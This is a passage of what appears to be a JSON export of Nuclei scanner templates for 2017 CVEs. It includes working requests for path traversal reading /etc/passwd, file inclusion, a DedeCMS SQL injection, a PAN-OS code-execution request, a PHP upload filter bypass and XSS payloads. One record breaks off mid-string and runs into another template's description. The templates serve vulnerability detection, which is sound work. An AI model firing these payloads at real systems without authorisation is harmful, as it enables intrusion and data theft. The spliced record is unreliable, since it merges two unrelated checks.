4a0a0047304502210091a03fe8bc062a8f4ab9b7ce6642025c5599951a009a17ed9ef4ffe4e24c7ccd0220570d8f49b671763897be8c2893f0da5b7e725eaa8a75b1d33581fc1327547dff:922c64590222798bb761d5b6d8e72950", "hash": "3d0d2b7f7ae521926f9508a5113135b4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fcb" }, "name": "CVE-2017-15287.yaml", "content": "id: CVE-2017-15287\n\ninfo:\n name: Dreambox WebControl 2.0.0 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the \"Name des Bouquets\" field, or the file parameter to the /file URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks.\n reference:\n - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf\n - https://www.exploit-db.com/exploits/42986/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-15287\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-15287\n cwe-id: CWE-79\n epss-score: 0.00129\n epss-percentile: 0.46737\n cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:*\n metadata:\n max-request: 1\n vendor: bouqueteditor_project\n product: bouqueteditor\n framework: dreambox\n tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project\n\nhttp:\n - raw:\n - |\n GET /webadmin/pkg?command= HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers:\n - type: word\n words:\n - 'Unknown command: '\n# digest: 
4b0a00483046022100d24d22a1cb3faec3366b57b8dbfa41642ebe1edf9ea030d6be399c7e13235dba022100bad23fce4b4a160d392284f9c0d6801f889143bcc01bac423b6cb519c33403ea:922c64590222798bb761d5b6d8e72950", "hash": "37d69ec3dd8d2e2b75ac3735e0e2e563", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fcc" }, "name": "CVE-2017-15363.yaml", "content": "id: CVE-2017-15363\n\ninfo:\n name: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter.\n impact: |\n The vulnerability allows an attacker to include local files, potentially leading to unauthorized access or code execution.\n remediation: |\n Update to the latest version of Restler and TYPO3 to fix the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/42985\n - https://extensions.typo3.org/extension/restler/\n - https://extensions.typo3.org/extension/download/restler/1.7.1/zip/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-15363\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-15363\n cwe-id: CWE-22\n epss-score: 0.04393\n epss-percentile: 0.92189\n cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:*\n metadata:\n max-request: 1\n vendor: luracast\n product: restler\n framework: typo3\n tags: cve,cve2017,restler,lfi,edb,luracast,typo3\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \", which could match '$' to a newline character in a malicious filename rather than matching 
only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.\n impact: |\n An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access.\n remediation: |\n Upgrade Apache httpd to a version higher than 2.4.29 or apply the necessary patches.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715\n - https://httpd.apache.org/security/vulnerabilities_24.html\n - http://www.openwall.com/lists/oss-security/2018/03/24/6\n - https://nvd.nist.gov/vuln/detail/CVE-2017-15715\n - http://www.securitytracker.com/id/1040570\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2017-15715\n cwe-id: CWE-20\n epss-score: 0.96163\n epss-percentile: 0.99387\n cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: http_server\n tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n ------WebKitFormBoundaryKc8fBVDo558U4hbJ\n Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n {{randstr_1}}\n\n ------WebKitFormBoundaryKc8fBVDo558U4hbJ\n Content-Disposition: form-data; name=\"name\"\n\n {{randstr}}.php\\x0A\n ------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n - |\n GET /{{randstr}}.php\\x0A HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip,deflate\n Accept: */*\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_2, \"{{randstr_1}}\")'\n# digest: 4b0a00483046022100ae5641ddd92e3d444dbbb35c3b15e833ad880957167aa6fad3e696b3f05e57d6022100a1460cf01679d7a517dba54d83abe3fa648044075c4c3c88058ee7687bb5a231:922c64590222798bb761d5b6d8e72950", "hash": "010bd5f802f0d221c44a8ebc943411ab", "level": 5, "time": "2024-05-17 
23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fcf" }, "name": "CVE-2017-15944.yaml", "content": "id: CVE-2017-15944\n\ninfo:\n name: Palo Alto Network PAN-OS - Remote Code Execution\n author: emadshanab,milo2012\n severity: critical\n description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches and updates provided by Palo Alto Networks.\n reference:\n - https://www.exploit-db.com/exploits/43342\n - https://security.paloaltonetworks.com/CVE-2017-15944\n - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-15944\n - http://www.securitytracker.com/id/1040007\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-15944\n epss-score: 0.97314\n epss-percentile: 0.99866\n cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: paloaltonetworks\n product: pan-os\n tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks\n\nhttp:\n - raw:\n - |\n GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\n Host: {{Hostname}}\n Cookie: PHPSESSID={{randstr}};\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"@start@Success@end@\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e0ebb82c78017bace95bb6bdbbd956c0ceefa723b30e23eaf66e133c3671020b02201e43c7c0e0a433896c4df5cfcc72d35bc21c5ead69bbb1c20e4903dc8d6705a1:922c64590222798bb761d5b6d8e72950", "hash": "00934c38a92bd42fb183d3af70b909d6", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf307fd0" }, "name": "CVE-2017-16806.yaml", "content": "id: CVE-2017-16806\n\ninfo:\n name: Ulterius Server < 1.9.5.0 - Directory Traversal\n author: geeknik\n severity: high\n description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server.\n remediation: |\n Upgrade Ulterius Server to version 1.9.5.0 or later to mitigate the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/43141\n - https://nvd.nist.gov/vuln/detail/CVE-2017-16806\n - https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee\n - https://www.exploit-db.com/exploits/43141/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-16806\n cwe-id: CWE-22\n epss-score: 0.07105\n epss-percentile: 0.93842\n cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: ulterius\n product: ulterius_server\n tags: cve2017,cve,ulterius,traversal,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini\"\n - \"{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"\\\\[(font|extension|file)s\\\\]\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200ba4a0e6757347a8f45e93acf626f6b963960f94fc7cb1934493fe84196f558602205b4f7a68184fc2f970c513193e6955898cadf0658f112d2d32e77c5af8eeb3ca:922c64590222798bb761d5b6d8e72950", "hash": "559a4f8cb1fe8b32f27fde54426f75a0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf307fd1" }, "name": "CVE-2017-16877.yaml", "content": "id: CVE-2017-16877\n\ninfo:\n name: Nextjs <2.4.1 - Local File Inclusion\n author: pikpikcu\n severity: high\n description: ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Upgrade Nextjs to version 2.4.1 or above to mitigate this vulnerability.\n reference:\n - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9\n - https://github.com/zeit/next.js/releases/tag/2.4.1\n - https://nvd.nist.gov/vuln/detail/CVE-2017-16877\n - https://github.com/vercel/next.js/commit/02fe7cf63f6265d73bdaf8bc50a4f2fb539dcd00\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-16877\n cwe-id: CWE-22\n epss-score: 0.00337\n epss-percentile: 0.68302\n cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zeit\n product: next.js\n tags: cve,cve2017,nextjs,lfi,traversal,zeit\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_next/../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c250b9c908590d5296d8fd48225795617103cff1b0a0082f49eccc4317ef7c2e022100f718c49e8cd4c13a059b632b35040a5391bb6a6714822a1348371aa8b2d51137:922c64590222798bb761d5b6d8e72950", "hash": "b42737d33864d079ee8711a5366af3ea", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd2" }, "name": "CVE-2017-16894.yaml", "content": "id: CVE-2017-16894\n\ninfo:\n name: Laravel <5.5.21 - Information Disclosure\n author: j4vaovo\n 
severity: high\n description: |\n Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the application.\n remediation: |\n Upgrade Laravel to version 5.5.21 or higher to fix the information disclosure vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16894\n - https://packetstormsecurity.com/files/cve/CVE-2017-16894\n - http://whiteboyz.xyz/laravel-env-file-vuln.html\n - https://twitter.com/finnwea/status/967709791442341888\n - https://nvd.nist.gov/vuln/detail/CVE-2017-16894\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-16894\n cwe-id: CWE-200\n epss-score: 0.11608\n epss-percentile: 0.95145\n cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: laravel\n product: laravel\n shodan-query: Laravel-Framework\n fofa-query: app=\"Laravel-Framework\"\n tags: cve,cve2017,laravel,exposure,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.env\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"APP_NAME=\"\n - \"APP_DEBUG=\"\n - \"DB_PASSWORD=\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a541924b65a67b00842f8a25418a80364b6d61f929707787057785e26f98d3b002205403d069324b4a48da8c6cba4b38fc4d1c04a8a1510526608e59a4bcab70e57e:922c64590222798bb761d5b6d8e72950", "hash": "2cef520c96106fe9592471370f4d5bb4", 
"level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd3" }, "name": "CVE-2017-17043.yaml", "content": "id: CVE-2017-17043\n\ninfo:\n name: WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Emag Marketplace Connector plugin 1.0 contains a reflected cross-site scripting vulnerability because the parameter \"post\" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.\n impact: |\n Successful exploitation of this vulnerability could lead to the theft of sensitive information, session hijacking, or the execution of arbitrary code in the context of the affected user.\n remediation: |\n Update to the latest version of the WordPress Emag Marketplace Connector plugin (1.1) or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://wordpress.org/support/topic/wordpress-emag-marketplace-connector-1-0-cross-site-scripting-vulnerability/\n - https://packetstormsecurity.com/files/145060/wpemagmc10-xss.txt\n - https://wpvulndb.com/vulnerabilities/8964\n - https://nvd.nist.gov/vuln/detail/CVE-2017-17043\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-17043\n cwe-id: CWE-79\n epss-score: 0.00245\n epss-percentile: 0.63923\n cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: zitec\n product: emag_marketplace_connector\n framework: wordpress\n tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/emag-marketplace-connector/'\n\n - method: GET\n path:\n - 
\"{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203013773f07b32293d187ef5593c809c0d5b199d0535add43a30b9558d54ad34b0220793cad7ec1c8c9661bbcec6319fcac9cd92006ed78d1f46ccc76dca5de51cb18:922c64590222798bb761d5b6d8e72950", "hash": "267053a9ae579ff4fd7fb002d2387b7c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd4" }, "name": "CVE-2017-17059.yaml", "content": "id: CVE-2017-17059\n\ninfo:\n name: WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser.\n remediation: |\n Update to the latest version of amtyThumb Posts plugin or apply the patch provided by the vendor.\n reference:\n - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1\n - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-17059\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-17059\n cwe-id: CWE-79\n epss-score: 0.00261\n epss-percentile: 0.63794\n cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: amtythumb_project\n product: amtythumb\n framework: wordpress\n tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project\n\nflow: http(1) && http(2)\n\nhttp:\n - 
raw:\n - |\n GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Amty Thumb'\n - 'Tags:'\n condition: and\n case-insensitive: true\n\n - method: POST\n path:\n - \"{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1\"\n\n body: \"amty_hidden=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022074f0b24a9cb480e81960e319cc7ee19b77dec9226fe67fb84ef549e875531ccb022100d2da121efbde5f1678796a09a5a402923ee1a4b01df208e0d978251d20b71f1b:922c64590222798bb761d5b6d8e72950", "hash": "24f06dad7e145d49f629fffb69bef0f9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd5" }, "name": "CVE-2017-17451.yaml", "content": "id: CVE-2017-17451\n\ninfo:\n name: WordPress Mailster <=1.5.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Mailster plugin (>=1.5.5) which includes a fix for this vulnerability.\n reference:\n - https://wordpress.org/plugins/wp-mailster/#developers\n - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html\n - https://wpvulndb.com/vulnerabilities/8973\n - https://nvd.nist.gov/vuln/detail/CVE-2017-17451\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: 
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-17451\n cwe-id: CWE-79\n epss-score: 0.00178\n epss-percentile: 0.55144\n cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wpmailster\n product: wp_mailster\n framework: wordpress\n tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'WP Mailster ='\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ec046f9a81c101fb374ae81bf7e992adeec3cc8e98a3583295368cde81c2129e022100a1232b8f02f87a0a260815390cb7e841d202487f1b339d81ed1212cc8af179de:922c64590222798bb761d5b6d8e72950", "hash": "7bdbec49ee9f0467d0761d8613970a8c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd6" }, "name": "CVE-2017-17562.yaml", "content": "id: CVE-2017-17562\n\ninfo:\n name: Embedthis GoAhead <3.6.5 - Remote Code Execution\n author: geeknik\n severity: high\n description: |\n description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade to Embedthis GoAhead version 3.6.5 or later to mitigate this vulnerability.\n reference:\n - https://www.elttam.com/blog/goahead/\n - https://github.com/ivanitlearning/CVE-2017-17562\n - 
https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562\n - https://github.com/embedthis/goahead/issues/249\n - https://nvd.nist.gov/vuln/detail/CVE-2017-17562\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2017-17562\n cwe-id: CWE-20\n epss-score: 0.97436\n epss-percentile: 0.9994\n cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:*\n metadata:\n max-request: 65\n vendor: embedthis\n product: goahead\n tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis\n\nhttp:\n - raw:\n - |\n GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n payloads:\n endpoint:\n - admin\n - apply\n - non-CA-rev\n - cgitest\n - checkCookie\n - check_user\n - chn/liveView\n - cht/liveView\n - cnswebserver\n - config\n - configure/set_link_neg\n - configure/swports_adjust\n - eng/liveView\n - firmware\n - getCheckCode\n - get_status\n - getmac\n - getparam\n - guest/Login\n - home\n - htmlmgr\n - index\n - index/login\n - jscript\n - kvm\n - liveView\n - login\n - login.asp\n - login/login\n - login/login-page\n - login_mgr\n - luci\n - main\n - main-cgi\n - manage/login\n - menu\n - mlogin\n - netbinary\n - nobody/Captcha\n - nobody/VerifyCode\n - normal_userLogin\n - otgw\n - page\n - rulectl\n - service\n - set_new_config\n - sl_webviewer\n - ssi\n - status\n - sysconf\n - systemutil\n - t/out\n - top\n - unauth\n - upload\n - variable\n - wanstatu\n - webcm\n - webmain\n - webproc\n - webscr\n - webviewLogin\n - webviewLogin_m64\n - webviewer\n - welcome\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"environment variable\"\n - \"display library search paths\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 480a004530430220137571f29820e7cfeff24983e553083fbd48df32ed6c9f6be7ab7a0b2ab3dcec021f1cf2aba6f6d18369d6d6d6784a620d36863b9446b26c941818edd6a6a12322:922c64590222798bb761d5b6d8e72950", "hash": 
"65c968e53b51e06110b459a04a9a4131", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd7" }, "name": "CVE-2017-17731.yaml", "content": "id: CVE-2017-17731\n\ninfo:\n name: DedeCMS 5.7 - SQL Injection\n author: j4vaovo\n severity: critical\n description: |\n DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of DedeCMS to mitigate the SQL Injection vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17731\n - https://nvd.nist.gov/vuln/detail/CVE-2017-17731\n - https://blog.csdn.net/nixawk/article/details/24982851\n - https://github.com/Lucifer1993/AngelSword/blob/232258e42201373fef1f323864366dc1499581fc/cms/dedecms/dedecms_recommend_sqli.py#L25\n - https://github.com/20142995/Goby\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-17731\n cwe-id: CWE-89\n epss-score: 0.02129\n epss-percentile: 0.88972\n cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dedecms\n product: dedecms\n shodan-query: http.html:\"DedeCms\"\n fofa-query: app=\"DedeCMS\"\n tags: cve,cve2017,sqli,dedecms\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022100ba551e3088d97f8d462ef4b105c0dc9c4bc6cef870e1e5898d660c13360a9c79022068cf574ec431237b66a83d1398a8b348cbcf96e48a36b441e77089f600452268:922c64590222798bb761d5b6d8e72950", "hash": "f3cdd8b5524975c6d7083349c8658fbc", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd8" }, "name": "CVE-2017-17736.yaml", "content": "id: CVE-2017-17736\n\ninfo:\n name: Kentico - Installer Privilege Escalation\n author: shiar\n severity: critical\n description: |\n Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 are susceptible to a privilege escalation attack. An attacker can obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard.\n impact: |\n An attacker can gain administrative privileges on the Kentico CMS system.\n remediation: |\n Upgrade to the latest version of Kentico CMS to fix the privilege escalation vulnerability.\n reference:\n - https://www.exploit-db.com/ghdb/5694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-17736\n - https://blog.hivint.com/advisory-access-control-bypass-in-kentico-cms-cve-2017-17736-49e1e43ae55b\n - https://github.com/0xSojalSec/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-17736\n cwe-id: CWE-425\n epss-score: 0.1483\n epss-percentile: 0.95656\n cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: kentico\n product: kentico_cms\n google-query: intitle:\"kentico database setup\"\n tags: cve2017,cve,kentico,cms,install,unauth,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/CMSInstall/install.aspx\"\n\n matchers-condition: or\n matchers:\n - type: word\n words:\n - \"Kentico\"\n - \"Database Setup\"\n - \"SQLServer\"\n condition: and\n\n - type: word\n words:\n - \"Database Setup\"\n - \"SQLServer\"\n condition: 
and\n# digest: 4a0a00473045022100ad66c367e331e508a9f4b8fa4a02f983e9f099aeadd13065ad5c5afce55ef49c022066cea12a22089ef4211b14cd43c45a6ee5a3d7ba24ae488ba1f0f9d108f68fcc:922c64590222798bb761d5b6d8e72950", "hash": "40b9028e47d2624536a524d2cd442a46", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd9" }, "name": "CVE-2017-18024.yaml", "content": "id: CVE-2017-18024\n\ninfo:\n name: AvantFAX 3.3.3 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of AvantFAX or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - https://hackerone.com/reports/963798\n - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18024\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/NarbehJackson/Java-Xss-minitwit16\n 